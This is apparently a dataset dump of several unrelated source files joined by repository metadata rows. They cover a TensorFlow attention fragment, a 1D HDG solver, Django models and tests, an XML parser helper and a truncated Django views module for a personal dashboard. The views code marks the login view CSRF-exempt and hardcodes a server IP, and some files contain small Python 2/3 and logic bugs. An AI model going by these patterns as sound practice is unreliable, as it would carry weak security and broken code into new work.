combo_input_flat = tf.reshape(combo_input, [batch_size, -1, 3*hidden_size]) #batch_size x p_length*q_length x 3*hidden_size
w_sim_tiled = tf.tile(tf.expand_dims(w_sim, 0), [batch_size, 1, 1]) #batch_size x 3*hidden_size x 1
sim_mtx_flat = tf.matmul(combo_input_flat, w_sim_tiled) #batch_size x p_length*q_length x 1
sim_mtx = tf.reshape(sim_mtx_flat, [batch_size, p_length, q_length, 1]) #batch_size x p_length x q_length x 1
#C2Q attention: how relevant are the query words to each context word?
#a #for each p, find weights to put on q. ##batch_size x p_length x q_length x hidden_size
att_on_q = tf.nn.softmax(sim_mtx, dim=2)
#q_inputs_aug = batch_size x p_length x q_length x hidden_size
weighted_q = tf.multiply(att_on_q, q_inputs_aug)
linear_combo_q_for_each_p = tf.reduce_sum(weighted_q, axis=2) #batch_size x p_length x hidden_size
#Q2C Attention: which context words have the closest similarity to one of the query words?
#for each context word choose which query word it helps contribute to the most
#then normalize over all context words, to get a distribution of helpfulness of all context words to this query
att_on_p = tf.nn.softmax(tf.reduce_max(sim_mtx, axis=2), dim=1) #batch_size x p_length x 1
weighted_p = tf.multiply(att_on_p, p_inputs) #batch_size x p_length x hidden_size
self.outputs = tf.concat([p_inputs, linear_combo_q_for_each_p, tf.multiply(p_inputs, linear_combo_q_for_each_p), tf.multiply(p_inputs, weighted_p)], axis=2)
| mit | -5,947,735,938,825,889,000 | 55.57377 | 168 | 0.637496 | false |
asdf123101/HDPG1D | hdpg1d/adaptation.py | 1 | 8070 | import numpy as np
from numpy import concatenate as cat
from scipy.sparse import csr_matrix
import scipy.sparse.linalg as spla
from copy import copy
import matplotlib.pyplot as plt
import warnings
from .preprocess import shape, discretization, boundaryCondition
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
# supress the deprecation warning
warnings.filterwarnings("ignore", ".*GUI is implemented.*")
class hdpg1d(object):
"""
1D HDG solver
"""
def __init__(self, coeff):
self.numEle = coeff.numEle
self.numBasisFuncs = coeff.pOrder + 1
self.coeff = coeff
self.mesh = np.linspace(0, 1, self.numEle + 1)
self.enrichOrder = 1
self.primalSoln = None
self.adjointSoln = None
self.estErrorList = [[], []]
self.trueErrorList = [[], []]
def separateSoln(self, soln):
"""Separate gradState (q and u), stateFace from the given soln"""
gradState, stateFace = np.split(
soln, [len(soln) - self.numEle + 1])
return gradState, stateFace
def plotState(self, counter):
"""Plot solution u with smooth higher oredr quadrature"""
stateSmooth = np.array([])
stateNode = np.zeros(self.numEle + 1)
xSmooth = np.array([])
gradState, _ = self.separateSoln(self.primalSoln)
halfLenState = int(len(gradState) / 2)
state = gradState[halfLenState:2 * halfLenState]
# quadrature rule
gorder = 10 * self.numBasisFuncs
xi, wi = np.polynomial.legendre.leggauss(gorder)
shp, shpx = shape(xi, self.numBasisFuncs)
for j in range(1, self.numEle + 1):
xSmooth = np.hstack((xSmooth, (self.mesh[(j - 1)] + self.mesh[j]) / 2 + (
self.mesh[j] - self.mesh[j - 1]) / 2 * xi))
stateSmooth = np.hstack(
(stateSmooth, shp.T.dot(state[(j - 1) * self.numBasisFuncs:j * self.numBasisFuncs])))
stateNode[j - 1] = state[(j - 1) * self.numBasisFuncs]
stateNode[-1] = state[-1]
plt.figure(1)
plt.plot(xSmooth, stateSmooth, '-', color='C3')
plt.plot(self.mesh, stateNode, 'C3.')
plt.xlabel('$x$', fontsize=17)
plt.ylabel('$u$', fontsize=17)
# plt.axis([-0.05, 1.05, 0, 1.3])
plt.grid()
plt.pause(5e-1)
def meshAdapt(self, index):
"""Given the index list, adapt the mesh"""
inValue = np.zeros(len(index))
for i in np.arange(len(index)):
inValue[i] = (self.mesh[index[i]] +
self.mesh[index[i] - 1]) / 2
self.mesh = np.sort(np.insert(self.mesh, 0, inValue))
def solvePrimal(self):
"""Solve the primal problem"""
if 'matLocal' in locals():
# if matLocal exists,
# only change the mesh instead of initializing again
matLocal.mesh = self.mesh
else:
matLocal = discretization(self.coeff, self.mesh)
matGroup = matLocal.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# solve by exploiting the local global separation
K = -cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]]))
.dot(cat((C, E)))) + H
sK = csr_matrix(K)
F_hat = np.array([L]).T - cat((C.T, G), axis=1)\
.dot(np.linalg.inv(np.bmat([[A, -B], [B.T, D]])))\
.dot(np.array([cat((R, F))]).T)
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sK, vec)
return matVec
n = len(F_hat)
preconditioner = spla.LinearOperator((n, n), invRHS)
stateFace = spla.gmres(sK, F_hat, M=preconditioner)[0]
# stateFace = np.linalg.solve(K, F_hat)
gradState = np.linalg.inv(np.asarray(np.bmat([[A, -B], [B.T, D]]))).dot(
cat((R, F)) - cat((C, E)).dot(stateFace))
self.primalSoln = cat((gradState, stateFace))
def solveAdjoint(self):
"""Solve the adjoint problem"""
# solve in the enriched space
_coeff = copy(self.coeff)
_coeff.pOrder = _coeff.pOrder + 1
if 'matAdjoint' in locals():
matAdjoint.mesh = self.mesh
else:
matAdjoint = discretization(_coeff, self.mesh)
matGroup = matAdjoint.matGroup()
A, B, _, C, D, E, F, G, H, L, R = matGroup
# add adjoint LHS conditions
F = np.zeros(len(F))
R[-1] = -boundaryCondition('adjoint')[1]
# assemble global matrix LHS
LHS = np.bmat([[A, -B, C],
[B.T, D, E],
[C.T, G, H]])
sLHS = csr_matrix(LHS)
RHS = cat((R, F, L))
# solve in one shoot using GMRES
def invRHS(vec):
"""Construct preconditioner"""
matVec = spla.spsolve(sLHS, vec)
return matVec
n = len(RHS)
preconditioner = spla.LinearOperator((n, n), invRHS)
soln = spla.gmres(sLHS, RHS, M=preconditioner)[0]
# soln = np.linalg.solve(LHS.T, RHS)
self.adjointSoln = soln
def DWResidual(self):
if 'matResidual' in locals():
matResidual.mesh = self.mesh
else:
matResidual = discretization(
self.coeff, self.mesh, self.enrichOrder)
matGroup = matResidual.matGroup()
A, B, BonQ, C, D, E, F, G, H, L, R = matGroup
LHS = np.bmat([[A, -B, C],
[BonQ, D, E]])
RHS = cat((R, F))
residual = np.zeros(self.numEle)
numEnrich = self.numBasisFuncs + self.enrichOrder
adjointGradState, adjointStateFace = self.separateSoln(
self.adjointSoln)
for i in np.arange(self.numEle):
primalResidual = (LHS.dot(self.primalSoln) - RHS).A1
uLength = self.numEle * numEnrich
stepLength = i * numEnrich
uDWR = primalResidual[stepLength:stepLength + numEnrich].dot(
(1 - adjointGradState)[stepLength:stepLength + numEnrich])
qDWR = primalResidual[uLength + stepLength:uLength +
stepLength + numEnrich]\
.dot((1 - adjointGradState)[uLength + stepLength:uLength +
stepLength + numEnrich])
residual[i] = uDWR + qDWR
# sort residual index
residualIndex = np.argsort(np.abs(residual))
# select top \theta% elements with the largest error
theta = 0.15
refineIndex = residualIndex[
int(self.numEle * (1 - theta)):len(residual)] + 1
return np.abs(np.sum(residual)), refineIndex
def adaptive(self):
TOL = self.coeff.TOL
estError = 10
nodeCount = 0
maxCount = self.coeff.MAXIT
while estError > TOL and nodeCount < maxCount:
# solve
self.solvePrimal()
self.solveAdjoint()
# plot the solution at certain counter
if nodeCount in [0, 4, 9, 19, maxCount]:
plt.clf()
self.plotState(nodeCount)
# record error
self.trueErrorList[0].append(self.numEle)
self.trueErrorList[1].append(
self.primalSoln[self.numEle * self.numBasisFuncs - 1])
estError, index = self.DWResidual()
self.estErrorList[0].append(self.numEle)
self.estErrorList[1].append(estError)
# adapt
index = index.tolist()
self.meshAdapt(index)
self.numEle = self.numEle + len(index)
nodeCount += 1
print("Iteration {}. Estimated target function error {:.3e}."
.format(nodeCount, estError))
if nodeCount == maxCount:
print("Max iteration number is reached "
"while the convergence criterion is not satisfied.\n"
"Check the problem statement or "
"raise the max iteration number, then try again.\n")
| mit | 3,414,982,141,776,126,000 | 38.950495 | 101 | 0.547212 | false |
trwhitcomb/cylc | cylc/flow/xtriggers/wall_clock.py | 1 | 1243 | #!/usr/bin/env python3
# THIS FILE IS PART OF THE CYLC SUITE ENGINE.
# Copyright (C) 2008-2019 NIWA & British Crown (Met Office) & Contributors.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""xtrigger function to check cycle point offset against the wall clock.
"""
from time import time
from cylc.flow.cycling.iso8601 import interval_parse
def wall_clock(offset=None, point_as_seconds=None):
"""Return True if now > (point + offset) else False."""
if offset is None:
offset_as_seconds = 0
else:
offset_as_seconds = int(interval_parse(offset).get_seconds())
return time() > (point_as_seconds + offset_as_seconds)
| gpl-3.0 | 1,752,127,795,411,126,800 | 36.666667 | 75 | 0.729686 | false |
IntSPstudio/vslst-python | sta/980004006.py | 1 | 1674 | #|==============================================================|#
# Made by IntSPstudio
# Project Visual Street
# ID: 980004006
# Twitter: @IntSPstudio
#|==============================================================|#
#SYSTEM
import os
import sys
#import time
import turtle
import math
#ALG
#Ympyrän kehän koko
def calcCircleRl(rlRadius):
#2PIR
output = 2*pi*rlRadius
return output
#Laskee piiraan kehän koon
def calcCircleSliceRl(rlAngle,rlRadius):
output = rlAngle/360*pi*rlRadius*2
return output
#CONTENT SCREEN
contentscreen = turtle.Screen()
contentscreen.bgcolor("black")
#TURTLE
julle = turtle.Turtle()
julle.color("white")
julle.speed(5)
#INPUT
scriptFle = sys.argv[0]
scriptCircleRadius = sys.argv[1]
scriptCircleSliceAngle = sys.argv[2]
#BASIC VRB
#systemContinuity =1
pi = math.pi
inputCircleRadius = int(scriptCircleRadius)
inputCircleSliceAngle = int(scriptCircleSliceAngle)
inputCircleRl = calcCircleRl(inputCircleRadius)
inputCircleSliceRl = calcCircleSliceRl(inputCircleSliceAngle,inputCircleRadius)
#CLEAR SCREEN
os.system("cls")
#PRINT DATA
print(" Radius:", inputCircleRadius)
print(" Slice:", scriptCircleSliceAngle)
print("Circle Rl:", inputCircleRl)
print(" Slice Rl:", inputCircleSliceRl)
print(" %Rld:", inputCircleSliceRl / inputCircleRl *100)
#ACTION
#Start position
julle.penup()
julle.forward(inputCircleRadius)
julle.left(90)
julle.pendown()
#Circle
julle.circle(inputCircleRadius)
#Slice
julle.pendown()
julle.left(90)
julle.forward(inputCircleRadius)
julle.right(180 - inputCircleSliceAngle)
julle.forward(inputCircleRadius)
julle.right(180)
julle.forward(inputCircleRadius)
#Wait
contentscreen.mainloop()
os.system("cls") | mit | -8,946,986,960,882,005,000 | 23.231884 | 79 | 0.72711 | false |
les-patissiers-du-web/django-website | patissiers/blog/tests/test_model_post.py | 1 | 1648 | # -*- coding: utf8 -*-
from __future__ import unicode_literals
from django.test import TestCase
from blog.models import Post, Category
import datetime
class PostTestCase(TestCase):
def setUp(self):
# Category
category = Category.objects.create(name='category', created=datetime.date.today())
# Draft post
Post.objects.create(title='Draft post',
category=category,
status=Post.STATUS_DRAFT,
excerpt='draft post',
slug='draft-post',
permalink='http://darkelda.net/draft-post',
description='',
content='#Draft post',
created=datetime.date.today())
def test_title(self):
post = Post.objects.get(slug='draft-post')
self.assertEqual(post.__unicode__(), post.title)
def test_creation(self):
category = Category.objects.get(name='category')
post = Post.objects.create(title='Hello world',
category=category,
status=Post.STATUS_DRAFT,
excerpt='Hello world, I\'m a software engineer',
slug='hello-world',
permalink='http://darkelda.net/hello-world',
description='',
content='#hello world',
created=datetime.date.today())
self.assertTrue(isinstance(post, Post)) | mit | 3,740,815,236,420,486,000 | 36.477273 | 90 | 0.482403 | false |
progdupeupl/pdp_website | pdp/article/models.py | 1 | 7425 | # coding: utf-8
#
# This file is part of Progdupeupl.
#
# Progdupeupl is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Progdupeupl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Progdupeupl. If not, see <http://www.gnu.org/licenses/>.
"""Models for article app."""
import os
import string
from django.db import models
# from django.db.models.signals import post_save
from django.conf import settings
# from django.dispatch import receiver
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from taggit.managers import TaggableManager
from pdp.utils import slugify
from pdp.utils.models import has_changed
from pdp.tutorial.models import Tutorial
from PIL import Image
from io import StringIO
from django.core.files.uploadedfile import SimpleUploadedFile
IMAGE_MAX_WIDTH = 64
IMAGE_MAX_HEIGHT = 64
def image_path(instance, filename):
"""Return path to an article image.
Returns:
string
"""
ext = filename.split('.')[-1]
filename = u'original.{}'.format(string.lower(ext))
return os.path.join('articles', str(instance.pk), filename)
def thumbnail_path(instance, filename):
"""Return path to an article thumbnail.
Returns:
string
"""
ext = filename.split('.')[-1]
filename = u'thumb.{}'.format(string.lower(ext))
return os.path.join('articles', str(instance.pk), filename)
class ArticleCategory(models.Model):
"""A way to organize article in different category."""
class Meta:
verbose_name = u'Catégorie d’article'
verbose_name_plural = u'Catégories d’article'
title = models.CharField(u'Titre', max_length=80)
slug = models.SlugField(max_length=80)
def __str__(self):
"""Textual representation of a category.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the category.
Returns:
string
"""
return reverse('pdp.article.views.by_category', args=(
self.slug,
))
def get_article_count(self):
"""Return number of articles in this category."""
return Article.objects \
.filter(is_visible=True) \
.filter(category__pk=self.pk).count()
class Article(models.Model):
"""An article."""
class Meta:
verbose_name = u'Article'
verbose_name_plural = u'Articles'
title = models.CharField(u'Titre', max_length=80)
description = models.CharField(u'Description', max_length=200)
text = models.TextField(u'Texte', blank=True)
author = models.ForeignKey(User, verbose_name=u'Auteur',
related_name='articles')
slug = models.SlugField(max_length=80)
pubdate = models.DateTimeField(u'Date de publication', blank=True)
tags = TaggableManager()
image = models.ImageField(upload_to=image_path,
blank=True, null=True, default=None)
thumbnail = models.ImageField(upload_to=thumbnail_path,
blank=True, null=True, default=None)
is_visible = models.BooleanField(u'Est visible publiquement',
default=False)
is_pending = models.BooleanField(u'Est en attente', default=False)
is_beta = models.BooleanField(u'Est visible par les membres',
default=False)
category = models.ForeignKey(ArticleCategory, null=True, blank=True,
verbose_name=u'Catégorie')
to_tutorial = models.ForeignKey(Tutorial,
verbose_name=u'Tutoriel correspondant',
null=True, blank=True)
def __str__(self):
"""Textual representation of an article.
Returns:
string
"""
return self.title
def get_absolute_url(self):
"""Get URL to view the article.
Returns:
string
"""
return reverse('pdp.article.views.redirect_view', args=(
self.pk, self.slug,
))
def get_pdf_url(self):
"""Get URL to get a PDF file of this article."""
return u'{}/articles/{}/{}.pdf'.format(
settings.MEDIA_URL,
self.pk,
self.slug,
)
def get_edit_url(self):
"""Get URL to edit the article.
Returns:
string
"""
return '/articles/editer?article={0}'.format(self.pk)
def get_download_url(self):
return u'{}?article={}'.format(
reverse('pdp.article.views.download'),
self.pk)
def save(self, force_update=False, force_insert=False,
thumb_size=(IMAGE_MAX_HEIGHT, IMAGE_MAX_WIDTH)):
"""Save the article.
This will save thumbnail on disk and then save the model in database.
"""
self.slug = slugify(self.title)
if has_changed(self, 'image') and self.image:
# TODO : delete old image
image = Image.open(self.image)
if image.mode not in ('L', 'RGB'):
image = image.convert('RGB')
image.thumbnail(thumb_size, Image.ANTIALIAS)
# save the thumbnail to memory
temp_handle = StringIO()
image.save(temp_handle, 'png')
temp_handle.seek(0) # rewind the file
# save to the thumbnail field
suf = SimpleUploadedFile(os.path.split(self.image.name)[-1],
temp_handle.read(),
content_type='image/png')
self.thumbnail.save('{}.png'.format(suf.name), suf, save=False)
# save the image object
super().save(force_update, force_insert)
else:
super().save()
def get_last_articles():
"""Get the last published articles.
This should be used for the home page article displaying.
Returns:
list of Article
"""
return Article.objects.all()\
.filter(is_visible=True)\
.order_by('-pubdate')[:5]
def get_prev_article(g_article):
"""Try to get the previous article ordered by pubdate.
If g_article is the first article ever, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__lt=g_article.pubdate)\
.order_by('-pubdate')[0]
except IndexError:
return None
def get_next_article(g_article):
"""Try to get the next article ordered by pubdate.
If g_article is the last one, None will be returned.
Returns:
Article
"""
try:
return Article.objects\
.filter(is_visible=True)\
.filter(pubdate__gt=g_article.pubdate)\
.order_by('pubdate')[0]
except IndexError:
return None
| agpl-3.0 | -5,753,180,119,510,398,000 | 26.072993 | 77 | 0.600566 | false |
FireCARES/harvester | tests/test_esri_harvest.py | 1 | 1453 | import unittest
from harvester.providers.esri import RESTHarvester
from harvester.util import chunk
from harvester.transform.esri import ESRIJSON
from tests import TEST_DIR
from tests.util import load_mock
import requests_mock
import os
@requests_mock.Mocker()
class TestESRIHarvesting(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
pass
def test_chunking(self, m):
m.register_uri('GET',
'http://www.esriserver.com/arcgis/rest/services/namespace/group/MapServer/0/'
'query?where=1%3D1&returnGeometry=false&returnIdsOnly=true&f=pjson',
text=load_mock('ids.json'))
harvester = RESTHarvester('http://www.esriserver.com/arcgis/rest/services/namespace/group/MapServer/0', data_dir=TEST_DIR)
self.assertEqual(list(chunk([], 1)), [])
self.assertEqual(list(chunk([1, 2, 3, 4], 2)), [[1, 2], [3, 4]])
ids = harvester.get_objectids()
self.assertEqual(len(list(chunk(ids, 500))), 8)
self.assertEqual(len(list(chunk(ids, 200))), 20)
def test_transform_to_geojson(self, m):
ESRIJSON.to_geojson('tests/mock/ex_features.json')
self.assertTrue(os.path.exists('tests/mock/ex_features.geojson'))
# Can we run again and overwrite the existing file w/o issue?
ESRIJSON.to_geojson('tests/mock/ex_features.json')
os.remove('tests/mock/ex_features.geojson')
| gpl-2.0 | 2,154,707,532,743,372,500 | 38.27027 | 130 | 0.659326 | false |
mdsitton/pyogl | pglgen/xmlparse.py | 1 | 3930 | from xml.parsers import expat
class TagStack(object):
def __init__(self):
self.tags = []
self.args = []
self.data = []
self.dataAdded = []
self.stackSize = 0
self.frameHasData = False
def push(self, tag, args):
self.tags.append(tag)
self.args.append(args)
self.data.append([])
self.dataAdded.append(False)
self.stackSize += 1
def add_data(self, data):
self.data[self.stackSize-1].append(data)
self.dataAdded[-1] = True
def clear_frame_data(self):
self.data[self.stackSize-1] = []
self.dataAdded[-1] = False
def is_data_added(self, posRel=0):
pos = -1 - posRel
return self.dataAdded[pos]
def pop(self):
self.dataAdded.pop()
stackFrame = (self.tags.pop(), self.args.pop(), self.data.pop())
self.stackSize -= 1
return stackFrame
def peek(self, posRel=0):
pos = -1 - posRel
return (self.tags[pos], self.args[pos], self.data[pos])
def path(self):
return '/'.join(self.tags)
class BaseParser(object):
def __init__(self, xmlParser, tag, parent, root):
# This is a hacky workaround to be able to pass in a data string
# to be accessed by any sub-parsers.
if isinstance(parent, str) or isinstance(parent, bytes):
self.strdata = parent
parent = None
else:
self.strdata = parent.strdata
self.xmlParser = xmlParser
self.parent = parent
self.tag = tag
self.root = root
if self.parent is None and self.tag is None and self.root is None:
self.isRoot = True
else:
self.isRoot = False
if self.isRoot:
self.stack = TagStack()
self.root = self
else:
self.stack = self.root.stack
self.parsers = {}
self.set_handlers()
self.init_data(self.strdata)
def set_handlers(self):
self.xmlParser.StartElementHandler = self.start
self.xmlParser.CharacterDataHandler = self.data
self.xmlParser.EndElementHandler = self.end
def restore_handlers(self):
if self.parent is not None:
self.parent.set_handlers()
def start(self, tag, attrs):
self.stack.push(tag, attrs)
tagPath = self.stack.path()
for parser in self.parsers:
if parser == tagPath:
ParserClass = self.parsers[parser]['object']
parInst = self.switch_parser(ParserClass)
self.parsers[parser]['instance'] = parInst
def data(self, data):
# We need to check if the stack frame has been used
# previously and clear the previous data if so.
if self.stack.is_data_added() is True:
self.stack.clear_frame_data()
self.stack.add_data(data.strip())
self.parse()
def end(self, tag):
if self.stack.is_data_added() is False:
self.parse()
if tag == self.tag:
self.integrate()
self.restore_handlers()
self.stack.pop()
def switch_parser(self, parser):
tag, attrs, data = self.stack.peek()
return parser(self.xmlParser, tag, self, self.root)
def register_parser(self, stackTree, parser):
self.parsers[stackTree] = {'object': parser}
# The following method stubs are what the parsing sub-classes
# will be implemented within.
def init_data(self, strData):
pass
def parse(self):
pass
def integrate(self):
pass
def parse_xml(rootParser, xmlPath, strdata):
xmlParser = expat.ParserCreate()
root = rootParser(xmlParser, None, strdata, None)
with open(xmlPath, 'rb') as xmlFile:
for line in xmlFile:
xmlParser.Parse(line.strip(), 0)
xmlParser.Parse(b'', 1)
return root
| bsd-2-clause | 870,257,657,208,985,100 | 25.554054 | 74 | 0.577354 | false |
utarsuno/urbtek | nexus_django/nexus_front_end/views.py | 1 | 45865 | # coding=utf-8
"""
This module, views.py, is where all the backend and frontend server requests are handled and returned to the user.
"""
# Needed to send back a rendered HTML page.
from django.shortcuts import render
# Needed for sending a simple HttpResponse such as a string response.
from django.http import HttpResponse
# Needed for allowing POST requests without requiring a CSRF token.
from django.views.decorators.csrf import csrf_exempt
# Needed for user verification.
from django.contrib.auth import authenticate, login, logout
# Needed for requiring the user to be logged in.
from django.contrib.auth.decorators import login_required
# Needed to perform HttpRequests to run Locust.
import requests
# Needed for making JsonResponses.
from django.http import JsonResponse
# Needed to check data on Users.
from django.contrib.auth.models import User
import sys
#sys.path.remove('/home/dev_usr/urbtek/nexus_django')
sys.path.append('/home/dev_usr/urbtek')
# Needed for database access.
from database import database_api
from database import table_definitions
# Needed for sending emails.
from universal_code import sms_sender
# Needed for debugging.
from universal_code import debugging as dbg
from quality_assurance.load_testing import locust_api
import datetime
import time
import pytz
# Importing custom defined models.
from .models import ScheduledTextNotification
from .models import Dividend
from .models import Project
from .models import SeleniumTest
from .models import TestSuiteRuns
from .models import SpecificSeleniumTestRun
from .models import WorkHours
from .models import Feedback
from universal_code import nexus_build_number as nbm
from quality_assurance.selenium_scripts.qa import qa_selenium_scripts as qss
from quality_assurance.selenium_scripts import test_parser
from quality_assurance.selenium_scripts import selenium_base
import ast
''' __ __ __ ___ ___ __ __ ___ __ ___ __ ___ __ __
/ _` | / \ |__) /\ | | | | | | | | \ / \ / /\ |__) | /\ |__) | |__ /__` _|_ |__ | | |\ | / ` | | / \ |\ | /__`
\__> |___ \__/ |__) /~~\ |___ \__/ | | |___ | | | \/ /~~\ | \ | /~~\ |__) |___ |___ .__/ | | \__/ | \| \__, | | \__/ | \| .__/
'''
# If the peon is currently free or not.
peon_is_free = False
# Get the number of git commits made to this project.
NEXUS_BUILD_NUMBER = nbm.get_nexus_build_number()
# Needed for database operations.
db = database_api.DatabaseConnectionForNexus()
db_api = database_api.DatabaseAPI(db)
# Needed for getting information on and running selenium tests.
qa_selenium_scripts = qss.QASeleniumScripts()
UTF_8 = 'utf-8'
current_locust = None
LOGIN_URL = 'login'
NEXUS_FRONT_END = 'templates/nexus_front_end/'
OUTSIDE_PAGES = NEXUS_FRONT_END + 'outside_pages/'
OUTSIDE_PAGES = NEXUS_FRONT_END + 'outside_pages/'
OUTSIDE_PAGES_LOGIN = OUTSIDE_PAGES + 'login.html'
OUTSIDE_PAGES_REGISTER = OUTSIDE_PAGES + 'register.html'
OUTSIDE_PAGES_ACCOUNT_RECOVER = OUTSIDE_PAGES + 'account_recover.html'
PERSONAL_PAGES = NEXUS_FRONT_END + 'personal'
PERSONAL_PAGES_TRADING = PERSONAL_PAGES + '/trading.html'
PERSONAL_PAGES_HOME = PERSONAL_PAGES + '/home.html'
PERSONAL_PAGES_PROFILE = PERSONAL_PAGES + '/profile.html'
PERSONAL_PAGES_SLEEP = PERSONAL_PAGES + '/sleep.html'
PERSONAL_PAGES_TEXT_NOTIFICATIONS = PERSONAL_PAGES + '/text_notifications.html'
QA_PAGES = NEXUS_FRONT_END + 'qa'
QA_PAGES_NATIONALS = QA_PAGES + '/nationals/nationals.html'
QA_PAGES_SELF = QA_PAGES + '/self_testing/qa_self_testing.html'
QA_PAGES_SELF_SELENIUM_TESTS = QA_PAGES + '/self_testing/qa_selenium_tests.html'
QA_PAGES_SK = QA_PAGES + '/sk/sk_selenium_tests.html'
ADMIN_PAGES = NEXUS_FRONT_END + 'admin/'
ADMIN_PAGES_ADMIN = ADMIN_PAGES + 'admin.html'
ADMIN_PAGES_DATABASE = ADMIN_PAGES + 'database.html'
ADMIN_PAGES_SERVERS = ADMIN_PAGES + 'servers.html'
SCC_PAGES = NEXUS_FRONT_END + 'scc/'
SCC_PAGES_IMAGE_COMPRESSION = SCC_PAGES + 'image_compression.html'
PERSONAL_PAGES_WORK_HOURS_LOGGING = SCC_PAGES + 'work_hours_logging.html'
PEON_URL = 'peon_url'
PEON_IP_URL = 'http://23.253.22.69:1337/'
# POST parameter names.
USERNAME = 'username'
EMAIL = 'email'
PASSWORD = 'password'
FIRST_NAME = 'first_name'
LAST_NAME = 'last_name'
CONTENT = 'content'
CUSTOM_SQL_COMMAND = 'custom_sql_command'
NUMBER_OF_USERS = 'number_of_users'
SPAWN_RATE = 'spawn_rate'
TEST_DURATION = 'test_duration'
JOINED_DATE = 'joined_date'
PHONE_NUMBER = 'phone_number'
CELL_CARRIER = 'cell_carrier'
ZIP_CODE = 'zip_code'
BIRTHDAY = 'birthday'
MESSAGE_CONTENT = 'content'
MESSAGE_TIME = 'time'
MESSAGE_DATE = 'date'
PAGE_SENT_FROM = 'page_sent_from'
PAYMENT_PER_SHARE = 'payment_per_share'
STOCK_TICKER_SYMBOL = 'stock_symbol'
NUMBER_OF_SHARES = 'number_of_shares'
PAYOUT_DATE = 'payout_date'
TEST_NAME = 'test_name'
TEST_RUN_TIME = 'test_run_time'
TEST_PASS_OR_FAIL = 'test_pass_or_fail'
TEST_NOTES = 'test_notes'
BROWSER_USED = 'browser_used'
UNIQUE_ID = 'unique_id'
# Field names for Selenium Testing.
PROJECT_NAME = 'project_name'
PROJECT_DESCRIPTION = 'project_description'
IS_FRONT_END = 'is_front_end'
CURRENT_HOME_URL = 'current_home_url'
TEST_NAME = 'test_name'
TEST_DESCRIPTION = 'test_description'
DATE_TIME_RAN = 'date_time_ran'
SPECIFIC_TEST_RUN_IDS = 'specific_test_run_ids'
SELENIUM_TEST = 'selenium_test'
RUN_ID = 'run_id'
RUN_TIME = 'run_time'
OUTPUT = 'output'
PASSED = 'passed'
BROWSER_USED = 'browser_used'
# Field names for work hours logging.
START_OR_STOP_TIME = 'start_or_stop_time'
IS_START_TIME = 'is_start_time'
# Server response messages.
SERVER_REPLY_INVALID_POST_DATA_ERROR = HttpResponse('Invalid POST data!')
SERVER_REPLY_INVALID_NUMBER_OF_POST_ARGUMENTS_ERROR = HttpResponse('Invalid number of POST arguments!')
SERVER_REPLY_GENERIC_NO = HttpResponse('n')
SERVER_REPLY_GENERIC_YES = HttpResponse('y')
SERVER_REPLY_GENERIC_LOGIC_ERROR = HttpResponse('l')
SERVER_REPLY_GENERIC_SERVER_ERROR = HttpResponse('s')
def check_POST_arguments(arguments, request):
"""Just a utility function to raise an exception if there is an in-correct match on POST arguments.
:param arguments: The arguments to check for.
:param request: Contains information regarding the request sent in.
:return: Boolean indicating if this threw an exception or not.
"""
if len(request.POST) != len(arguments):
dbg.raise_exception(dbg.MyException, 'Got ' + str(len(request.POST)) + ' number of arguments instead of ' + str(len(arguments)))
return HttpResponse(SERVER_REPLY_INVALID_NUMBER_OF_POST_ARGUMENTS_ERROR)
for arg in arguments:
if arg not in request.POST:
dbg.raise_exception(dbg.MyException, 'Argument not passed in : ' + str(arg) + '.')
return HttpResponse(SERVER_REPLY_INVALID_POST_DATA_ERROR)
return None
''' ___ __ __ ___ ___ __
|__ |__) / \ |\ | | |__ |\ | | \
| | \ \__/ | \| | |___ | \| |__/
'''
@csrf_exempt
def login_GET(request):
"""This handles the GET request to retrieve the login page.
:param request: Contains information regarding the request sent in.
:return: The login page.
"""
specific_page_after_login = request.GET.get('next', 'no_next')
if specific_page_after_login == 'no_next':
return render(request, OUTSIDE_PAGES_LOGIN, {'redirect_url': 'profile', 'build_number': NEXUS_BUILD_NUMBER})
else:
return render(request, OUTSIDE_PAGES_LOGIN, {'redirect_url': specific_page_after_login, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def profile_GET(request):
"""This handles the GET request to retrieve the profile page.
:param request: Contains information regarding the request sent in.
:return: The profile page.
"""
current_user = request.user
#print('Cell carrier for ' + str(current_user) + ' is ' + current_user.profile.cell_carrier + '.')
return render(request, PERSONAL_PAGES_PROFILE, {'cell_carriers': sorted(sms_sender.cell_carriers_dictionary.keys()), 'current_cell_carrier': current_user.profile.cell_carrier, 'build_number': NEXUS_BUILD_NUMBER})
@login_required(login_url=LOGIN_URL)
def home_GET(request):
"""This handles the GET request to retrieve the home page.
:param request: Contains information regarding the request sent in.
:return: The home page.
"""
return render(request, PERSONAL_PAGES_HOME, {'build_number': NEXUS_BUILD_NUMBER})
def register_GET(request):
"""This handles the GET request to retrieve the register page.
:param request: Contains information regarding the request sent in.
:return: The register page.
"""
return render(request, OUTSIDE_PAGES_REGISTER)
def account_recover_GET(request):
"""This handles the GET request to retrieve the account recover page.
:param request: Contains information regarding the request sent in.
:return: The account recover page.
"""
return render(request, OUTSIDE_PAGES_ACCOUNT_RECOVER)
@login_required(login_url=LOGIN_URL)
def logout_GET(request):
"""This handles the GET request to logout. It will return the login page and logout the user.
:param request: Contains information regarding the request sent in.
